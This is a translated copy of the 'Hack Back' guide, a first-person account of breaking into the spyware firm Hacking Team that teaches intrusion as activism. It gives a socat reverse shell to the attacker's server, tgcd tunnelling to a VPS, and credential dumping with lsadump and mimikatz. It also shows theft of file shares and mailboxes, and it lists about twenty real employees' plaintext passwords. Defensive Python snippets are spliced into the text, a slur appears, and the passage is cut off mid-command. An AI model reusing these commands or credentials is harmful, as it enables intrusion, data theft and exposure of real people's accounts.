HackBack 2 translation
a guest, Apr 16th, 2016

Hack Back!

A DIY guide

#antisec



--[ 1 - Introduction ]-----------------------------------------------------------

You'll notice the change in language since the last edition [1]. The English-speaking world already has books, talks, guides and information to spare about hacking. In that world there are much better hackers than myself, but unfortunately they waste their knowledge working for "defense" contractors and intelligence agencies, protecting the banks and corporations and defending the established order. The hacker culture was born in the USA as a counterculture, but the sole remnant of those beginnings is the aesthetics. At least they get to receive a shirt, dye their hair blue, use their hacker aliases and feel like rebels while they work for the system.

Before, you had to break into offices to leak files [2]. You needed a gun to rob a bank. Today you can do it from your bed with a laptop in your hands [3][4]. As the CNT said after the Gamma Group hack: "we'll try to take a step forward with new ways of fighting" [5]. Hacking is a powerful tool, let's learn and fight!

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group


--[ 2 - Hacking Team ]----------------------------------------------------------

Hacking Team was a company that helped governments hack and spy on journalists, activists, political opponents and other threats to their power [1][2][3][4][5][6][7][8][9][10][11]. And, every now and then, criminals and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the fascist slogan "boia chi molla". "boia chi vende RCS" (executioner who sells RCS) would have been more appropriate. They also claimed to have technology to solve the Tor and darknet "problem" [13]. But since I remain free, I have my doubts about their effectiveness.

[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web


--[ 3 - Be careful out there ]----------------------------------------------

Our world is upside down. Doing bad things makes you rich, and doing good things gets you arrested. Fortunately, thanks to the hard work of people like those of the Tor Project [1], you can avoid getting arrested by following a few guidelines:

1) Encrypt your hard drive [2]

If the police have come to take your computer, it means you have made a lot of mistakes, but better safe than sorry.

2) Use a virtual machine and route all your traffic through Tor

This accomplishes two things. First, all connections are anonymized through the Tor network. Second, keeping your personal life and your anonymous life on different computers helps you not to mix them up accidentally.

You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or something custom made [6]. Here [7] is a detailed comparison.

3) (Optional) Don't connect directly to the Tor network

Tor isn't the be-all and end-all. It's possible to correlate the hours in which you're connected with the hours in which your hacker alias is active. There have also been successful attacks against the network [8]. You can connect to the Tor network using someone else's wifi. Wifislax [9] is a Linux distro with a lot of wifi hacking tools. Another option is to connect to a VPN or a bridge [10] before Tor, but that is less safe, because then they can correlate the hacker's activity with your home network (this was used as evidence against Jeremy Hammond [11]).

The reality is that, while Tor isn't perfect, it works pretty well. When I was young and reckless, I did lots of things with no protection (I mean hacking) other than Tor, and the police did all they could to track me down, and I never had any problems.

[1] https://www.torproject.org/
[2] https://info.securityinabox.org/es/chapter-4
[3] https://www.whonix.org/
[4] https://tails.boum.org/
[5] https://www.qubes-os.org/doc/privacy/torvm/
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
[7] https://www.whonix.org/wiki/Comparison_with_Others
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
[9] http://www.wifislax.com/
[10] https://www.torproject.org/docs/bridges.html.en
[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html


----[ 3.1 - Infrastructure ]---------------------------------------------------

Don't hack directly from Tor exit nodes. They are blacklisted, they are slow, and they can't receive connect-back shells. Tor serves to protect my anonymity while I connect to the infrastructure I use to hack, which consists of:

1) Domain names

Useful for command and control (C&C), and for DNS tunneling for guaranteed egress.

2) Stable servers

Useful as C&C servers, for receiving connect-back shells, for launching attacks and for storing the hacked data.

3) Hacked servers

Useful as pivots to hide the stable servers' IP addresses, and for when I want a fast connection without pivoting. For example, port scanning, scanning the whole Internet, downloading a database via SQL injection, etc.

Obviously you have to pay anonymously, with bitcoin for example (if you use it carefully).


----[ 3.2 - Attribution ]--------------------------------------------------------

Often there's news that an attack was carried out by government hackers (APTs), because they always use the same tools, leave the same footprints and even use the same infrastructure (domains, emails, etc.). They are negligent because they can hack without legal consequences.

I didn't want to help the police's work by connecting the Hacking Team hack with my other hacks and the aliases of my regular work as a black hat. So I used new servers and domains, registered with new emails and paid for with new bitcoins. Also, I only used public tools and things I wrote specifically for this attack, and I changed my way of doing some things so as not to leave my usual forensic footprint.


--[ 4 - Getting information ]---------------------------------------------------

Even though it can be boring, this step is very important, because the bigger the attack surface, the easier it is to find a flaw.

----[ 4.1 - Technical information ]-----------------------------------------------

Some tools and techniques are:

1) Google

You can find lots of unexpected things with a few well-chosen searches. For example, the identity of DPR [1]. The bible of how to use Google for hacking is the book "Google Hacking for Penetration Testers". You can also find a brief summary in Spanish in [2].

2) Subdomain enumeration

Often the main domain of a company is hosted by a third party, and you'll find the company's own IP ranges thanks to subdomains such as mx.company.com, ns1.company.com, etc. Also, sometimes there are things that shouldn't be exposed in "hidden" subdomains. Useful tools for finding domains and subdomains include fierce [3], theHarvester [4], and recon-ng [5].

3) Searches and reverse whois lookups

With a reverse lookup using the whois information of a domain or the IP range of a company, you can find other domains and IP ranges of theirs. As far as I know, there is no free way to do reverse whois lookups, apart from a Google "hack":

"via della moscova 13" site:www.findip-address.com
"via della moscova 13" site:domaintools.com

4) Port scanning and fingerprinting

Unlike the other techniques, this one talks directly to the company's servers. I include it in this section because it isn't an attack, only a way to find more information. The company's IDS might generate an alert because of the scan, but don't worry: the whole Internet is scanned constantly.

For scanning, nmap [6] is the tool to use, and it can fingerprint most of the discovered services. For companies with big IP ranges, zmap [7] or masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint websites.

[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
[3] http://ha.ckers.org/fierce/
[4] https://github.com/laramies/theHarvester
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
[6] https://nmap.org/
[7] https://zmap.io/
[8] https://github.com/robertdavidgraham/masscan
[9] http://www.morningstarsecurity.com/research/whatweb
[10] http://blindelephant.sourceforge.net/


----[ 4.2 - Social information ]------------------------------------------------

For social engineering, it is very useful to have information about the employees: their roles, contact information, operating system, browser, plugins, software, etc. Some resources:

1) Google

Here too, it is the most useful tool.

2) theHarvester and recon-ng

I already mentioned them in the previous section, but they have much more functionality. They can find information quickly and automatically. It's worth reading all of their documentation.

3) LinkedIn

You can find a lot of information about the employees here. The company's recruiters are the most likely to accept your contact requests.

4) Data.com

Previously known as Jigsaw. It has the contact information of lots of employees.

5) File metadata

You can find a lot of data about the employees and their systems in the metadata of files published by the company. Useful tools for finding files on the company's website and extracting their metadata include metagoofil [1] and FOCA [2].

[1] https://github.com/laramies/metagoofil
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html


--[ 5 - Entering the network ]----------------------------------------------------

There are many ways to get in. Even though the method I used for Hacking Team is uncommon and much more laborious than what is usually needed, I'll talk a little about the more common methods, which I recommend you try first.


----[ 5.1 - Social engineering ]-------------------------------------------------

Social engineering, specifically spear phishing, is responsible for most hacks nowadays. For an introduction in Spanish, see [1]. For more information in English, see [2] (the third part, "Targeted Attacks"). For funny stories of social engineering from past generations, see [3]. I didn't want to try spear phishing against Hacking Team, because their whole business is helping governments spear phish their opponents, so there was a higher risk that Hacking Team would recognize and investigate the attack.

[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf


----[ 5.2 - Buying access ]----------------------------------------------------

Thanks to hardworking Russians and their exploit kits, traffic dealers and bot herders, lots of companies already have compromised computers inside their networks. Almost every Fortune 500 company, with their enormous networks, has a few bots inside. However, Hacking Team is a much smaller company, and most of its employees are infosec experts, so there was little likelihood that they were already compromised.


----[ 5.3 - Technical exploitation ]-----------------------------------------------

After the Gamma Group hack, I found a way to search for vulnerabilities [1]. Hacking Team had a public IP range:

inetnum: 93.62.139.32 - 93.62.139.47
descr: HT public subnet

Hacking Team had very little exposed to the Internet. For example, unlike Gamma Group, their customer support site needed a client certificate to connect. They had their main website (a Joomla blog in which Joomscan [2] didn't find any major flaws), a mail server, a couple of routers, two VPN devices and a spam-filtering device. So I had three options: find a 0day in Joomla, find a 0day in postfix, or find a 0day in one of the embedded devices. A 0day in an embedded device seemed like the most reachable option, and after weeks of reverse engineering work, I found a remote root exploit. Since the vulnerabilities haven't been patched yet, I won't give any more details. For more information on how to find this kind of vulnerability, see [3] and [4].

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] http://sourceforge.net/projects/joomscan/
[3] http://www.devttys0.com/
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A


--[ 6 - Being prepared ]-------------------------------------------------------

I did a lot of work and testing before using the exploit against Hacking Team. I wrote a backdoored firmware and compiled various post-exploitation tools for the embedded system. The backdoor serves to protect the exploit: using the exploit only once and then coming back through the backdoor makes the task of finding and patching the vulnerabilities much harder.

The post-exploitation tools I had prepared were:

1) busybox [1]

For all the common UNIX utilities the system didn't have.

2) nmap [2]

To scan and fingerprint Hacking Team's internal network.

3) Responder.py [3]

The most useful tool for attacking Windows networks when you have access to the internal network but no domain user.

4) Python [4]

To run Responder.py.

5) tcpdump [5]

To sniff traffic.

6) dsniff [6]

To sniff passwords from weak protocols like ftp, and to do ARP spoofing. I wanted to use ettercap, written by Hacking Team's own ALoR and NaGa, but it was hard to compile it for the system.

7) socat [7]

For a comfortable shell with a pty:
my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
hacked system: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
tcp:my_server:my_port

And for much else; it's a network Swiss army knife. See the examples section of its documentation.

8) screen [8]

With the socat pty it isn't strictly necessary, but I wanted to feel at home in Hacking Team's network.

9) a SOCKS proxy server [9]

To use alongside proxychains to access the internal network from any other program.

10) tgcd [10]

To forward ports, like the SOCKS server's, through the firewall.

[1] https://www.busybox.net/
[2] https://nmap.org/
[3] https://github.com/SpiderLabs/Responder
[4] https://github.com/bendmorris/static-python
[5] http://www.tcpdump.org/
[6] http://www.monkey.org/~dugsong/dsniff/
[7] http://www.dest-unreach.org/socat/
[8] https://www.gnu.org/software/screen/
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
[10] http://tgcd.sourceforge.net/


The worst that could happen would be that my backdoor or post-exploitation tools left the system unstable and caused an employee to investigate. So I spent a week testing my exploit, backdoor and post-exploitation tools in the networks of other vulnerable companies before entering Hacking Team's network.


--[ 7 - Watch and listen ]---------------------------------------------------

Now inside the internal network, I wanted to take a look around and think before taking the next step. I used Responder.py in analysis mode (-A, to listen without poisoning requests), and I did a slow scan with nmap.


--[ 8 - NoSQL databases ]--------------------------------------------------

NoSQL, or more correctly NoAuthentication, has been a great gift to the hacker community [1]. Just when I was worried that they had finally fixed all the authentication bypass flaws in MySQL [2][3][4][5], they started using trendy new databases with no authentication by design. Nmap finds a few in Hacking Team's internal network:

27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 47547
| totalSize = 49856643072
...
|_ version = 2.6.5

27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 31987
| totalSize = 33540800512
| databases
...
|_ version = 2.6.5

These were the databases for RCS test instances. The audio recorded by RCS is stored in MongoDB with GridFS. The audio folder in the torrent [6] comes from here. They were unwittingly spying on themselves.

[1] https://www.shodan.io/search?query=product%3Amongodb
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
[6] https://ht.transparencytoolkit.org/audio/


--[ 9 - Crossed wires ]-------------------------------------------------------

Even though it was fun listening to the recordings and watching webcam images of Hacking Team developing their malware, it wasn't very useful. According to their documentation [1], their iSCSI devices should be on a separate network, but nmap finds a few in their subnet 192.168.1.200/24:

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
...
3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:ht-synology.name
| Address: 192.168.200.66:3260,0
|_ Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:synology-backup.name
| Address: 10.0.1.72:3260,0
| Address: 192.168.200.72:3260,0
|_ Authentication: No authentication required

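The MongoDB listings in section 8 and the iSCSI listings above are exactly the findings an internal audit should surface before anyone else does. The following is an added example, not code from the guide: a small parser for nmap's normal output that flags services which answered without authentication and notes iSCSI targets advertised on more than one subnet (the "crossed wires" the documentation said should not exist). The iSCSI hosts are the ones quoted above; the MongoDB host address 192.0.2.10 is a constructed placeholder.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in nmap's normal output format. The iSCSI hosts are the ones quoted in the
# guide; the MongoDB host address (192.0.2.10) is a constructed placeholder.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.0.2.10
27017/tcp open  mongodb MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
|_  version = 2.6.5

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:ht-synology.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:synology-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\S+)\))?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")


@dataclass
class Port:
    number: int
    service: str
    script_lines: list = field(default_factory=list)  # NSE output with the "| " prefixes removed


@dataclass
class Host:
    name: str
    ports: list = field(default_factory=list)


def parse_nmap(text):
    """Parse nmap normal output into hosts, their open ports and the NSE script lines per port."""
    hosts, current_port = [], None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            hosts.append(Host(m.group(1)))
            current_port = None
        elif (m := PORT_RE.match(line)) and hosts:
            current_port = Port(int(m.group(1)), m.group(3))
            hosts[-1].ports.append(current_port)
        elif line.startswith("|") and current_port is not None:
            current_port.script_lines.append(line.lstrip("|_ ").strip())
    return hosts


def audit_unauthenticated(hosts):
    """Return one finding per service that handed out data or access without authentication."""
    findings = []
    for host in hosts:
        for port in host.ports:
            script = port.script_lines
            # mongodb-databases runs listDatabases; "ok = 1" means it succeeded with no credentials
            if port.service == "mongodb" and "mongodb-databases:" in script and "ok = 1" in script:
                findings.append(f"{host.name}:{port.number} MongoDB listDatabases succeeded without credentials")
            if script and script[0] == "iscsi-info:" and "Authentication: No authentication required" in script:
                addresses = sorted(l.split()[1].split(":")[0] for l in script if l.startswith("Address:"))
                subnets = sorted({a.rsplit(".", 1)[0] for a in addresses})  # /24 prefixes, good enough here
                note = f" (reachable from {len(subnets)} subnets: {', '.join(subnets)})" if len(subnets) > 1 else ""
                findings.append(f"{host.name}:{port.number} iSCSI target without authentication{note}")
    return findings


if __name__ == "__main__":
    for finding in audit_unauthenticated(parse_nmap(SAMPLE_NMAP_OUTPUT)):
        print(finding)
```
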
iSCSI needs a kernel module, and it was difficult to compile it for the embedded system. I forwarded the port to mount it from a VPS:

VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

Now iSCSI finds the target iqn.2000-01.com.synology, but has problems mounting it because it thinks that the address is 192.168.200.72 instead of 127.0.0.1.

I solved it like this:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

And now, after:
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

...the file system appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

and find backups of many virtual machines. The Exchange server seems to be the most interesting one. It's too big to download, but we can mount it remotely and look for interesting files:
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
we find the virtual machine's hard drive and mount it:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

...and we have finally sorted through all the layers and can see the files of the old Exchange server in /mnt/part1

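The offset arithmetic above (start sector times sector size) is the same step a forensic examiner takes to mount a disk image read-only, and it generalizes to every partition fdisk lists. This added example, not code from the guide, parses fdisk -l output, computes each partition's byte offset and size, refuses partitions that run past the end of the image, and emits read-only losetup and mount commands. Only the partition line of the sample listing is the one quoted above; its header lines are constructed.

```python
import re

# Constructed "fdisk -l" listing. The partition line is the one quoted above; the header lines
# are added here (in the same fdisk generation's format) so that the sector size and the image
# size are read from the listing rather than assumed.
SAMPLE_FDISK = """\
Disk /dev/loop0: 644.2 GB, 644245094400 bytes
255 heads, 63 sectors/track, 78325 cylinders, total 1258291200 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes

     Device Boot      Start         End      Blocks   Id  System
/dev/loop0p1            2048  1258287103   629142528    7  HPFS/NTFS/exFAT
"""

SECTOR_SIZE_RE = re.compile(r"Sector size \(logical/physical\): (\d+) bytes")
TOTAL_SECTORS_RE = re.compile(r"total (\d+) sectors")
# device, optional boot flag, start, end, blocks (old fdisk marks odd sizes with '+'), id, type
PART_RE = re.compile(r"^(/dev/\S+)\s+(\*\s+)?(\d+)\s+(\d+)\s+(\d+)\+?\s+(\S+)\s+(.+)$")


def parse_partitions(fdisk_output):
    """Return (sector_size, partitions); each partition carries its byte offset and size."""
    sector_size, total_sectors, partitions = 512, None, []  # 512 is fdisk's default unit
    for line in fdisk_output.splitlines():
        if m := SECTOR_SIZE_RE.search(line):
            sector_size = int(m.group(1))
        elif m := TOTAL_SECTORS_RE.search(line):
            total_sectors = int(m.group(1))
        elif m := PART_RE.match(line):
            start, end = int(m.group(3)), int(m.group(4))
            partitions.append({
                "device": m.group(1),
                "start": start,
                "end": end,
                "offset": start * sector_size,            # what losetup -o / mount offset= expect
                "size": (end - start + 1) * sector_size,  # sizelimit, so the mount cannot run past the partition
                "type": m.group(7).strip(),
                # an end beyond the last sector means a truncated image or a damaged partition table
                "in_bounds": total_sectors is None or end < total_sectors,
            })
    return sector_size, partitions


def mount_commands(fdisk_output, image, mount_root):
    """Read-only losetup + mount commands per partition; raises for partitions outside the image."""
    _, partitions = parse_partitions(fdisk_output)
    commands = []
    for index, part in enumerate(partitions):
        if not part["in_bounds"]:
            raise ValueError(f"{part['device']} ends past the image; partition table corrupt or image truncated")
        loop = f"/dev/loop{index + 1}"
        target = f"{mount_root}/{part['device'].rsplit('/', 1)[1]}"
        commands.append(f"losetup -r -o {part['offset']} --sizelimit {part['size']} {loop} {image}")
        commands.append(f"mount -o ro {loop} {target}")
    return commands


if __name__ == "__main__":
    for cmd in mount_commands(SAMPLE_FDISK, "Exchange.hackingteam.com-flat.vmdk", "/mnt"):
        print(cmd)
```
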
[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf


--[ 10 - From backup to domain admin ]---------------------

What interests me most in the backup is checking whether it has a password or hash that I can use to access the live server. I use pwdump, cachedump and lsadump [1] on the registry hives. lsadump finds the password of the service account besadmin:

_SC_BlackBerry MDS Connection Service
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........

I use proxychains [2] with the SOCKS server on the embedded system and smbclient [3] to try the password:
proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

It works! The besadmin password is still valid, and it's a local admin. I use my proxy and the psexec_psh module from metasploit [4] to get a meterpreter session. Then I migrate to a 64-bit process, "load kiwi" [5], "creds_wdigest", and I have a lot more passwords, including the domain admin's:

HACKINGTEAM BESAdmin bes32678!!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword <---- go sysadmin!
HACKINGTEAM m.romeo ioLK/(90
HACKINGTEAM l.guerra 4luc@=.=
HACKINGTEAM d.martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
HACKINGTEAM a.scarafile Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A!e$$andra
HACKINGTEAM m.bettini Ettore&Bella0314
HACKINGTEAM m.luppi Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set!dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f@#
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571&2E
HACKINGTEAM e.rabe erab@4HT!

[1] https://github.com/Neohapsis/creddump7
[2] http://proxychains.sourceforge.net/
[3] https://www.samba.org/
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
[5] https://github.com/gentilkiwi/mimikatz


--[ 11 - Downloading the emails ]-----------------------------------------------

Now that I have the domain admin's password, I have access to the emails, the heart of the company. Since every move I make carries a risk of detection, I downloaded the emails before continuing to explore. Powershell makes it easy [1]. Curiously, I found a bug in its date handling. After acquiring the emails, it took me a couple more weeks to find the source code and everything else, so I returned every now and then to download the new emails. The server was Italian, and the dates had the format day/month/year. I use:

-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

with New-MailboxExportRequest to download the new emails (in this case, all the emails since the 5th of June). The problem is that it said the date was invalid if the day was greater than 12 (I guess this is because the US puts the month first and there is no month greater than 12). It seems the Microsoft engineers only tested their software with their own regional settings.

[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/


--[ 12 - Downloading files ]-------------------------------------------------

Now that I'm domain admin, I also started downloading the shared folders, using my proxy and smbclient's -Tc option, for example:

proxychains smbclient '//192.168.1.230/FAE DiskStation' \
-U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'

This is how I downloaded the Amministrazione, FAE DiskStation and FileServer folders of the torrent.


--[ 13 - Introduction to Windows domain hacking ]-----------------------

Before continuing the story of the idiot faggots (translator's note: this is slang, and might be poorly translated), I need to tell you something about attacking Windows networks.


----[ 13.1 - Lateral movement ]-----------------------------------------------

I'm going to give a brief review of the techniques for moving around inside a Windows network. The remote execution techniques need the password or hash of a local administrator. The most common way to get these credentials is to use mimikatz [1], mainly sekurlsa::logonpasswords and sekurlsa::msv, on the computers where you already have administrator privileges. The "in situ" movement techniques also require admin privilege (apart from runas). The most common privilege escalation techniques are PowerUp [2] and bypassuac [3].

[1] https://adsecurity.org/?page_id=1821
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1


Remote movement:

1) psexec

The simplest and most tested way of moving around Windows networks. You can use psexec [1], winexe [2], psexec_psh from metasploit [3], invoke_psexec from powershell empire [4], or the windows command "sc" [5]. For the metasploit module, powershell empire and pth-winexe [6], you just need the hash, not the password. It is the most universal way (it works on any computer with port 445 open), but it is also the least cautious. It shows up in the event log as event 7045 "Service Control Manager". In my experience no one has ever noticed the hack that way, but sometimes they notice it after the fact, and it helps the investigators understand what the hacker did.

2) WMI

The most cautious way. The WMI service is enabled on all windows computers, but, apart from on servers, the firewall blocks it by default. You can use wmiexec.py [7], pth-wmis [6] (here is a demonstration [8]), invoke_wmi from powershell empire [9], or the windows command wmic [5]. All of them except wmic need only the hash.

3) PSRemoting [10]

It is disabled by default, and I don't advise enabling new protocols that aren't necessary. But if the sysadmin has already enabled it, it is very convenient, especially if you use powershell for everything (and yes, you should use powershell for almost everything; that will change [11] with powershell 5 and windows 10, but today powershell makes it easy to do everything in RAM, evade antivirus and leave few traces).

4) Scheduled tasks

You can run remote programs with schtasks [5]. It works in the same situations as psexec, and it also leaves known traces [12].

5) GPO

If all these protocols are disabled or blocked by the firewall, since you're domain admin, you can use GPO to push a logon script, install an msi, run a scheduled task [13], or, as we'll see with the computer of Mauro Romeo (Hacking Team's sysadmin), enable WMI and open the firewall through GPO.

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
[2] https://sourceforge.net/projects/winexe/
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
[4] http://www.powershellempire.com/?page_id=523
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
[6] https://github.com/byt3bl33d3r/pth-toolkit
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/
[9] http://www.powershellempire.com/?page_id=124
[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
[11] https://adsecurity.org/?p=2277
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py

  505.  
In situ movement:

1) Impersonating tokens

Once you have admin access to a computer, you can use the tokens of the other users to access resources in the domain. Two tools to do this are incognito [1] and the token::* commands from mimikatz [2].

2) MS14-068

You can exploit a flaw in kerberos authentication to generate a domain admin ticket [3][4][5].

3) Pass the Hash

If you have a user's hash but the user isn't logged in, you can use sekurlsa::pth [2] to obtain a ticket for that user.

4) Process injection

Any RAT can inject itself into another process, for example with the migrate command in meterpreter and pupy [6] or psinject [7] in powershell empire. You can inject into the process that has the token you want.

5) runas

This is sometimes very useful because it doesn't require admin privileges. The command is part of windows, but if you don't have a GUI you can use powershell [8].

[1] https://www.indetectables.net/viewtopic.php?p=211165
[2] https://adsecurity.org/?page_id=1821
[3] https://github.com/bidord/pykek
[4] https://adsecurity.org/?p=676
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
[6] https://github.com/n1nj4sec/pupy
[7] http://www.powershellempire.com/?page_id=273
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1


----[ 13.2 - Persistence ]-----------------------------------------------------

Once you gain access, you want to keep it. Really, persistence alone is a challenge for sons of bitches like those of Hacking Team who want to hack activists and other individuals. To hack companies you don't need persistence, because they never sleep. I always use "persistence" in the style of duqu 2: work in RAM on a couple of servers with high uptime. In the hypothetical case that they all reboot at the same time, I have passwords and a golden ticket [1] for backup access. You can read more about windows persistence mechanisms here [2][3][4]. But to hack companies you don't need it, and it increases the risk of detection.

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
[3] http://www.hexacorn.com/blog/category/autostart-persistence/
[4] https://blog.netspi.com/tag/persistence/


----[ 13.3 - Internal reconnaissance ]-------------------------------------------

The best tool nowadays for understanding windows networks is Powerview [1]. It's worth reading everything written by its author [2], above all [3], [4], [5] and [6]. Powershell itself is also very powerful [7]. Since there are still many 2003 and 2000 servers without powershell, you also need to learn the old school way [8], with tools like netview.exe [9] or the windows command "net view". Other techniques I like are:

1) Downloading a list of file names

With a domain admin account, you can download all the file names in the network with powerview:

    Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
